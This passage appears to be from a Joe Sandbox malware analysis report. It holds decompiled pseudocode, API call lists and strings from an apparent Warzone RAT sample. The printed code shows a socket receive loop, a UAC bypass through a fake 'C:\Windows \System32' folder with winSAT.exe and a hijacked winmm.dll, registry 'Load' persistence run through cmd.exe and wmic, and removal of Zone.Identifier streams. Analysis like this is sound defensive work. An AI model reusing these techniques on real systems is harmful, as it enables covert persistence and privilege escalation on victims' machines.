				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t47;
				void* _t51;
				char* _t54;
				intOrPtr _t79;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t114;
				char* _t115;
				char _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				_t114 = __edx;
				_t89 = __ecx;
				_t47 = E010311C0(0x10040, __ecx);
				_t88 = _t89;
				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4); // executed
					_t117 = 0;
					E01031052( &_v65600, 0, 0xffff);
					_t120 = _t119 + 0xc;
					_v60 = 0;
					_v56 = 0;
					_t51 = E010334D1( &_v12, "warzoneTURBO"); // executed
					E01033115( &_v52, _t114, _t51);
					E01035FEB(_v12);
					_v24 = 0;
					_v20 = 0;
					while(1) {
						_t54 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117); // executed
						_t115 = _t54;
						if(_t115 != 0xc) {
							goto L8;
						}
						_v16 = _t117;
						_t106 =  &_v16;
						_v12 = _t117;
						E010330CC( &_v16,  &_v65600, _t54);
						_t107 = _t120;
						E0103315E(_t120,  &_v16);
						E0103315E(_t120,  &_v52);
						E010361F0( &_v44, _t114, _t120, _t107,  &_v16, _t106);
						_t120 = _t120 + 0x10;
						_t79 =  *((intOrPtr*)(_v44 + 4));
						_t118 = _t79 + 0xc;
						if(_t79 == 0 || _t118 == _t115) {
							L7:
							E01033148( &_v44);
							E01033148( &_v16);
							L9:
							_t96 =  &_v24;
							E010330CC( &_v24,  &_v65600, _t115);
							_t97 = _t120;
							E0103315E(_t120,  &_v24);
							E0103315E(_t120,  &_v52);
							E010361F0( &_v36, _t114, _t120, _t97,  &_v24, _t96);
							_t120 = _t120 + 0x10;
							E010330FE(_t88 + 0x10);
							E010330CC(_t88 + 0x10, _v36, _t115);
							E010330FE( &_v24);
							E010330FE( &_v36);
							E0103507E(_t88, _t114, _a4);
							E01033148( &_v36);
							if(_t115 <= 0) {
								goto L12;
							}
							_t117 = 0;
							continue;
						} else {
							while(1) {
								_t85 =  &_v65600 + _t115;
								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0);
								if(_t85 == 0xffffffff) {
									break;
								}
								_t115 = _t115 + _t85;
								if(_t118 != _t115) {
									continue;
								}
								goto L7;
							}
							E01033148( &_v44);
							E01033148( &_v16);
							L12:
							E01033148( &_v24);
							E01033148( &_v52);
							return E01033148( &_v60);
						}
						L8:
						if(_t115 == 0xffffffff) {
							goto L12;
						}
						goto L9;
					}
				}
				return _t47;
			}

0x0103577f
0x0103577f
0x01035787
0x0103578d
0x01035795
0x010357a0
0x010357b6
0x010357bd
0x010357c7
0x010357cc
0x010357cf
0x010357d5
0x010357dd
0x010357e6
0x010357ee
0x010357f3
0x010357f6
0x010357f9
0x010357fc
0x01035806
0x0103580c
0x01035811
0x00000000
0x00000000
0x0103581e
0x01035822
0x01035825
0x01035828
0x01035832
0x01035835
0x01035842
0x0103584a
0x01035852
0x01035855
0x01035858
0x0103585d
0x0103588b
0x0103588e
0x01035896
0x010358a6
0x010358ae
0x010358b1
0x010358bb
0x010358be
0x010358cb
0x010358d3
0x010358d8
0x010358de
0x010358ea
0x010358f2
0x010358fa
0x01035904
0x0103590c
0x01035913
0x00000000
0x00000000
0x01035915
0x00000000
0x01035863
0x01035863
0x01035870
0x01035876
0x0103587f
0x00000000
0x00000000
0x01035885
0x01035889
0x00000000
0x00000000
0x00000000
0x01035889
0x0103591f
0x01035927
0x0103592c
0x0103592f
0x01035937
0x00000000
0x0103593f
0x0103589d
0x010358a0
0x00000000
0x00000000
0x00000000
0x010358a0
0x010357f9
0x01035948

APIs

setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 010357B6

Part of subcall function 010334D1: lstrlenA.KERNEL32(?,76B30770,?,01035B8D,.bss,00000000), ref: 010334DA
Part of subcall function 010334D1: lstrlenA.KERNEL32(?,?,01035B8D,.bss,00000000), ref: 010334E7
Part of subcall function 010334D1: lstrcpyA.KERNEL32(00000000,?,?,01035B8D,.bss,00000000), ref: 010334FA

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

recv.WS2_32(000000FF,?,0000000C,00000000), ref: 01035806
recv.WS2_32(000000FF,?,000000FF,00000000), ref: 01035876

Strings

warzoneTURBO, xrefs: 010357D8
`, xrefs: 010357A0

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
String ID: `$warzoneTURBO
API String ID: 3973575906-3455775371
Opcode ID: dff64a681b68970737b8e2373b79b3fb163983f67799ba6be80202eab8520743
Instruction ID: d3abca35b50f769689eaa113a679562ce695690498cb654fd29c6b788c99e92d
Opcode Fuzzy Hash: dff64a681b68970737b8e2373b79b3fb163983f67799ba6be80202eab8520743
Instruction Fuzzy Hash: 4351A17190011AABCB15EBA5CCD5CEEBB7CFFA4720F004169E495BB1A0EB715A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01036034 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01036034(void* __ecx) {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x0103603e
0x01036044

APIs

GetProcessHeap.KERNEL32(00000000,?,01033156,?,01035D68,00000000,?,01042694,?,?,0104577A), ref: 01036037
RtlFreeHeap.NTDLL(00000000,?,?,0104577A), ref: 0103603E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 89b497cf57fc9f496e4a267837be28d9090c391e6560c65898b2e6593112fef4
Instruction ID: dc0e1cd07dac690cf31a36ec1ce2772de602f4a9c6f28a1fe2599e898c98457a
Opcode Fuzzy Hash: 89b497cf57fc9f496e4a267837be28d9090c391e6560c65898b2e6593112fef4
Instruction Fuzzy Hash: 34A002F9965100DBDE6467B09F4DB163519A744702F044544B64585145976D54048771

Uniqueness

Uniqueness Score: -1.00%

Function 010454EB Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 191
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010454EB(void* __eflags) {
				char _v592;
				char _v608;
				char _v1120;
				short _v1140;
				char _v1372;
				intOrPtr _v1492;
				char _v1496;
				char _v1508;
				char _v1512;
				char _v1528;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1560;
				intOrPtr _v1568;
				intOrPtr _v1584;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				intOrPtr _v1604;
				int _v1608;
				char _v1616;
				char _v1620;
				char _v1624;
				void* _v1628;
				char _v1632;
				char _v1636;
				char _v1648;
				void* __edi;
				void* _t57;
				void* _t100;
				void* _t103;
				CHAR* _t116;
				char* _t123;
				CHAR* _t129;
				void* _t133;

				_v1616 = 0xa;
				_v1608 = 0;
				E01035D37( &_v1596);
				E01042C11( &_v1508);
				E010310AD(GetTickCount());
				_v1648 = 0x104;
				GetModuleFileNameA(0,  &_v1372, _t129);
				_v1624 = 0;
				_t57 = E010434A2( &_v1372,  &_v1624); // executed
				_t128 = _v1624;
				if(_v1624 == 0) {
					L22:
					E0104267D( &_v1508);
					E01035D5C( &_v1596, _t129);
					return 0;
				} else {
					_v1620 = 0;
					E01043279(_t57, _t128, 0x215a,  &_v1620);
					_t133 = 0x20;
					_t129 = E01031085(_t133);
					_t116 = _t129;
					do {
						 *_t116 = 0;
						_t116 =  &(_t116[1]);
						_t133 = _t133 - 1;
					} while (_t133 != 0);
					E0103102C(_t129,  &_v1620, 4);
					 *0x1189cb0 = CreateEventA(0, 0, 0, _t129);
					if(GetLastError() == 0xb7) {
						goto L22;
					}
					_t145 =  *0x1189cb0;
					if( *0x1189cb0 == 0) {
						goto L22;
					}
					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1628,  &_v1608); // executed
					RegSetValueExA(_v1628, "MaxConnectionsPer1_0Server", 0, 4,  &_v1616, 4); // executed
					RegSetValueExA(_v1628, "MaxConnectionsPerServer", 0, 4,  &_v1616, 4); // executed
					RegCloseKey(_v1628);
					E01035B4E( &_v1596, _t128, _t145); // executed
					E01042A7F( &_v1508, _t128, _t145,  &_v1596); // executed
					_t119 =  &_v592;
					E01035000( &_v592, _t128, _t145,  &_v1600,  &_v1512); // executed
					E01031052( &_v1120, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120); // executed
					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v1140, 0); // executed
					if(_v1568 != 0 && E0104111B() != 1) {
						_t103 = E01040A3C();
						_t148 = _t103 - 0xa;
						if(_t103 != 0xa) {
							E01042F55(__eflags);
						} else {
							E0104313A(_t128, _t148);
						}
					}
					if(_v1552 != 0) {
						_t100 = E0104111B();
						_t150 = _t100 - 1;
						if(_t100 == 1) {
							E01044F7E(_t119, _t150);
						}
					}
					if(_v1548 != 0) {
						E0103F073();
					}
					_t152 = _v1492;
					if(_v1492 != 0) {
						L18:
						__eflags = _v1560;
						if(__eflags != 0) {
							E01043EBA();
						}
						E01034F74( &_v608, _t128, __eflags); // executed
						goto L21;
					} else {
						E010426DC( &_v1528, _t152, _v1592, _v1584, _v1544); // executed
						_t153 = _v1604;
						if(_v1604 == 0) {
							goto L18;
						}
						_v1624 = 0;
						_t123 =  &_v1632;
						E0103373F(_t123,  &_v1496);
						_push(_t123);
						E010420F8( &_v1624, _t153,  &_v1636,  &_v1628);
						E01035FEB(_v1648);
						E01035FEB(0);
						L21:
						E01034C8D( &_v608, _t129, _t153);
						goto L22;
					}
				}
			}

0x010454fb
0x01045508
0x0104550c
0x01045518
0x01045524
0x01045529
0x01045539
0x01045543
0x0104554e
0x01045553
0x01045559
0x0104576e
0x01045775
0x0104577e
0x0104578b
0x0104555f
0x01045563
0x0104556f
0x01045576
0x0104557d
0x01045582
0x01045584
0x01045584
0x01045586
0x01045587
0x01045587
0x01045594
0x010455a6
0x010455b6
0x00000000
0x00000000
0x010455bc
0x010455c2
0x00000000
0x00000000
0x010455e5
0x01045604
0x01045619
0x0104561f
0x01045629
0x0104563a
0x0104564c
0x01045653
0x01045666
0x0104567b
0x0104568e
0x0104569d
0x010456a7
0x010456b3
0x010456b8
0x010456bb
0x010456c4
0x010456bd
0x010456bd
0x010456bd
0x010456bb
0x010456cd
0x010456cf
0x010456d4
0x010456d7
0x010456d9
0x010456d9
0x010456d7
0x010456e2
0x010456e4
0x010456e4
0x010456e9
0x010456f0
0x0104574b
0x0104574b
0x0104574f
0x01045751
0x01045751
0x0104575d
0x00000000
0x010456f2
0x01045705
0x0104570a
0x0104570e
0x00000000
0x00000000
0x01045717
0x0104571c
0x01045720
0x01045725
0x01045734
0x0104573d
0x01045744
0x01045762
0x01045769
0x00000000
0x01045769
0x010456f0

APIs

GetTickCount.KERNEL32 ref: 0104551D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 01045539

Part of subcall function 010434A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,01045553), ref: 010434CF
Part of subcall function 010434A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,01045553), ref: 010434E2
Part of subcall function 010434A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,01045553), ref: 010434F3
Part of subcall function 010434A2: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,01045553), ref: 01043500

Part of subcall function 01031085: GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
Part of subcall function 01031085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 010455A0
GetLastError.KERNEL32 ref: 010455AB
RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 010455E5
RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 01045604
RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 01045619
RegCloseKey.ADVAPI32(?), ref: 0104561F
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 0104567B
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0104568E
CreateDirectoryW.KERNEL32(?,00000000), ref: 0104569D

Part of subcall function 01042F55: CloseHandle.KERNEL32(?,00000000,?,?,0103555F,?,?,00000000,00000000,?,?,?,01035909,?,00000000,00000000), ref: 01042F7F
Part of subcall function 01042F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,01035909,?,00000000,00000000,?,?,?,?,?,?), ref: 01042F99
Part of subcall function 01042F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,01035909,?,00000000,00000000), ref: 01042FBE
Part of subcall function 01042F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01042FE3
Part of subcall function 01042F55: lstrcatW.KERNEL32(?,\winSAT.exe), ref: 01042FF7
Part of subcall function 01042F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0104301B
Part of subcall function 01042F55: lstrcatW.KERNEL32(?,\winmm.dll), ref: 01043029
Part of subcall function 01042F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 01043039
Part of subcall function 01042F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 01043041
Part of subcall function 01042F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 01043056
Part of subcall function 01042F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 01043065
Part of subcall function 01042F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 01043083
Part of subcall function 01042F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01035909), ref: 0104308A
Part of subcall function 01042F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01035909), ref: 01043094

Part of subcall function 010426DC: CopyFileW.KERNEL32(?,?,00000000,?,010476A4,?,00000000,?,?,?,?,00000000,76B30770,00000000), ref: 0104277D

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 010420F8: CreateProcessW.KERNEL32 ref: 01042133

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

MaxConnectionsPer1_0Server, xrefs: 010455FB
MaxConnectionsPerServer, xrefs: 01045610
\Microsoft Vision\, xrefs: 01045681
Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 010455DB
@Mqt, xrefs: 010455AB

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HeapModuleNameSystemWow64$AllocateChangeCountCurrentDisableErrorEventFindFolderFreeHandleLastNotificationPathReadRedirectionSizeTickVirtuallstrcpy
String ID: @Mqt$MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
API String ID: 117119787-3289194230
Opcode ID: 1a7bad7bd87d282e7226316ab79acb9a9ba7a2b3487c6ec35734306a32b4e383
Instruction ID: 55a6c0a7f9480946882d86d1850f14e8969de84bec24aaed286a5cc82986f8d2
Opcode Fuzzy Hash: 1a7bad7bd87d282e7226316ab79acb9a9ba7a2b3487c6ec35734306a32b4e383
Instruction Fuzzy Hash: BD6118B1504345ABD720EF60DDC4EEFB7ECBBA8644F40093EB6C592060DB759949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 010426DC Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 296
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E010426DC(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char* _a8, void* _a12) {
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr* _v24;
				WCHAR* _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _t90;
				void* _t94;
				intOrPtr* _t112;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t145;
				intOrPtr* _t147;
				int _t152;
				int _t179;
				char* _t185;
				WCHAR* _t192;
				intOrPtr _t228;
				intOrPtr* _t254;
				CHAR* _t255;
				void* _t261;
				WCHAR* _t263;
				WCHAR** _t264;
				char** _t265;
				void* _t268;

				_t268 = __eflags;
				_t254 = __ecx;
				_v24 = __ecx;
				E010409A0(); // executed
				_t250 = 0xa;
				_t185 =  &_v44;
				E010335B9(_t185, _t250, _t268); // executed
				_push(_t185);
				_push(_t185);
				_t90 = E01042514(__ecx, _t185, __ecx + 0x10); // executed
				E01042554(__ecx);
				_t179 = 0;
				if(_t90 == 0) {
					L4:
					_t259 = _t254 + 0x10;
					goto L5;
				} else {
					_t270 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t250 =  *((intOrPtr*)(__ecx + 0xc));
						_t264 = __ecx + 0x20;
						E01033549(_t264, E01040C8A( &_v28,  *((intOrPtr*)(__ecx + 0xc)), _t270));
						E01040C3E(E01035FEB(_v28), _t264);
						E0103373F( &_v16, _t254 + 0x4c);
						E01033447(E0103357C(_t264, _t250, _t270, "\\"), _t270,  &_v16);
						_t243 = _v16;
						E01035FEB(_v16);
						if(CopyFileW(_v20,  *_t264, 0) != 0) {
							E01033333(_t264, _t250, _t265);
							E01035A61(_t254 + 0x30, _t250, _t265);
							E010361F0( &_v40, _t250, _t264, _t264, _t243, _t243);
							_t265 =  &(_t265[4]);
							_t259 = _t254 + 0x10;
							E01042612(_t254, 0x80000001, _t254 + 0x10, 0xf003f, 0);
							E010425DF(_t254, _t254 + 0x18,  &_v40, 3);
							E01033148( &_v40);
							L5:
							if( *_t254 == _t179) {
								E01042612(_t254, 0x80000001, _t259, 0xf003f, _t179); // executed
							}
							_t273 = _a12 - _t179;
							if(_a12 == _t179) {
								L11:
								__eflags = _a8;
								if(__eflags != 0) {
									__eflags = _a4;
									_t260 = _t254 + 0x20;
									_a12 = _t254 + 0x20;
									if(_a4 == 0) {
										E01033549(_t260,  &_v20);
									}
									E01033666(_t260,  &_a4);
									E01035FEB(_a4);
									_t255 = E01031085(0x200);
									E0103102C(_t255, "cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /f /v Load /t REG_SZ /d \"", 0x68);
									_t261 = E01031133( *((intOrPtr*)(E01033666(_t260,  &_a4))));
									E01035FEB(_a4);
									_t112 = E01033666(_a12,  &_a4);
									_t74 =  &(_t255[0x68]); // 0x68
									E0103102C(_t74,  *_t112, _t261);
									E01035FEB(_a4);
									_t76 =  &(_t255[0x68]); // 0x68
									__eflags =  &(_t76[_t261]);
									E0103102C( &(_t76[_t261]), "\"", 2);
									WinExec(_t255, _t179);
								}
								E010336F7( &_a4,  *((intOrPtr*)(_v24 + 0x20))); // executed
								_t94 = E010336F7( &_a12, L":Zone.Identifier"); // executed
								E01033447( &_a4, __eflags, _t94); // executed
								E01035FEB(_a12);
								DeleteFileW(_a4); // executed
								_t192 = _a4;
								_t179 = 1;
								__eflags = 1;
							} else {
								__imp__SHGetKnownFolderPath(_t179, _t179,  &_v32);
								E010336F7( &_v16, _v32);
								E0103357C( &_v16, _t250, _t273, L"\\programs.bat");
								E010336F7( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\"");
								E0103357C(E0103357C(E0103357C( &_v12, _t250, _t273, _v16), _t250, _t273, L":start"), _t250, _t273, L"\") do %%A");
								_t130 = E01033666( &_v12,  &_v36);
								_t132 = E01033666( &_v16,  &_v28);
								E010433B6( *_t132,  *_t130, E01033373( &_v12));
								E01035FEB(_v28);
								E01035FEB(_v36);
								E01040C8A( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273);
								 *_t265 = L":ApplicationData";
								E0103357C( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273, 0x1047570);
								E010336F7( &_a12, L"wmic process call create \'\"");
								_t263 = _v28;
								E0103357C(E0103357C( &_a12,  *((intOrPtr*)(_v24 + 0xc)), _t273, _t263),  *((intOrPtr*)(_v24 + 0xc)), _t273, L"\"\'");
								E0103357C( &_v16,  *((intOrPtr*)(_v24 + 0xc)), _t273, L":start");
								_t145 = E01033666( &_a12,  &_v28);
								_t147 = E01033666( &_v16,  &_v36);
								E010433B6( *_t147,  *_t145, E01033373( &_a12));
								E01035FEB(_v36);
								E01035FEB(_v28);
								_t179 = 0;
								_t152 = CopyFileW(_v20, _t263, 0);
								_t228 = _a12;
								if(_t152 != 0) {
									E01035FEB(_t228);
									_a12 = 0;
									E01035FEB(_t263);
									E01035FEB(_v12);
									_v12 = 0;
									E01035FEB(_v16);
									_t254 = _v24;
									goto L11;
								} else {
									E01035FEB(_t228);
									_a12 = 0;
									E01035FEB(_t263);
									E01035FEB(_v12);
									_t192 = _v16;
									_v12 = 0;
								}
							}
							E01035FEB(_t192);
						}
					}
				}
				E01035FEB(_v44);
				E01035FEB(_v20);
				return _t179;
			}

0x010426dc
0x010426e5
0x010426ea
0x010426ed
0x010426f4
0x010426f5
0x010426f8
0x010426fd
0x010426fe
0x01042706
0x0104270f
0x01042714
0x01042718
0x010427dc
0x010427dc
0x00000000
0x0104271e
0x0104271e
0x01042721
0x00000000
0x01042727
0x01042727
0x0104272d
0x01042738
0x01042747
0x01042753
0x0104276a
0x0104276f
0x01042772
0x01042785
0x01042790
0x0104279b
0x010427a3
0x010427a8
0x010427ab
0x010427bc
0x010427cd
0x010427d5
0x010427df
0x010427e1
0x010427f1
0x010427f1
0x010427f6
0x010427f9
0x0104297c
0x0104297c
0x01042980
0x01042986
0x0104298a
0x0104298d
0x01042990
0x01042998
0x01042998
0x010429a3
0x010429ab
0x010429bc
0x010429c4
0x010429e2
0x010429e4
0x010429f0
0x010429f8
0x010429fc
0x01042a04
0x01042a0b
0x01042a0e
0x01042a16
0x01042a20
0x01042a20
0x01042a2f
0x01042a3c
0x01042a45
0x01042a4d
0x01042a55
0x01042a5b
0x01042a60
0x01042a60
0x010427ff
0x0104280a
0x01042816
0x01042823
0x01042830
0x01042854
0x01042860
0x0104286e
0x01042882
0x0104288a
0x01042892
0x010428a0
0x010428a8
0x010428af
0x010428bc
0x010428c1
0x010428d4
0x010428dd
0x010428e9
0x010428f7
0x0104290b
0x01042914
0x0104291c
0x01042921
0x01042928
0x0104292e
0x01042933
0x01042957
0x0104295e
0x01042961
0x01042969
0x01042971
0x01042974
0x01042979
0x00000000
0x01042935
0x01042935
0x0104293c
0x0104293f
0x01042947
0x0104294c
0x0104294f
0x0104294f
0x01042933
0x01042a61
0x01042a61
0x01042785
0x01042721
0x01042a69
0x01042a71
0x01042a7c

APIs

Part of subcall function 010409A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,0104563F,?,01042BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 010409C1

Part of subcall function 01042514: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,76B30770,?,?,0104270B,?,?), ref: 01042534

Part of subcall function 01042554: RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

CopyFileW.KERNEL32(?,?,00000000,?,010476A4,?,00000000,?,?,?,?,00000000,76B30770,00000000), ref: 0104277D

Part of subcall function 01042612: RegCreateKeyExW.ADVAPI32(76B30770,00000000,00000000,00000000,00000000,0104563F,00000000,?,?,?,?,0104563F,?,01042B64,80000001,?), ref: 01042646
Part of subcall function 01042612: RegOpenKeyExW.KERNEL32(76B30770,00000000,00000000,0104563F,?,?,?,0104563F,?,01042B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 01042661

Part of subcall function 010425DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,010427D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 010425FE

SHGetKnownFolderPath.SHELL32(01047570,00000000,00000000,?,?,?,?,?,00000000,76B30770,00000000), ref: 0104280A
CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,0104A074,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 01042928

Part of subcall function 01040C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 01040CBB

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01040C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0104274C,00000000,?,?,?,?,00000000,76B30770,00000000), ref: 01040C44

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 01033447: lstrcatW.KERNEL32(00000000,76B30770), ref: 01033477

WinExec.KERNEL32 ref: 01042A20
DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,76B30770,00000000), ref: 01042A55

Strings

:start, xrefs: 0104283A, 01042842, 010428D9
\programs.bat, xrefs: 0104281B
for /F "usebackq tokens=*" %%A in (", xrefs: 01042828
wmic process call create '", xrefs: 010428B4
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d ", xrefs: 010429BE
:Zone.Identifier, xrefs: 01042A34
") do %%A, xrefs: 01042835

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

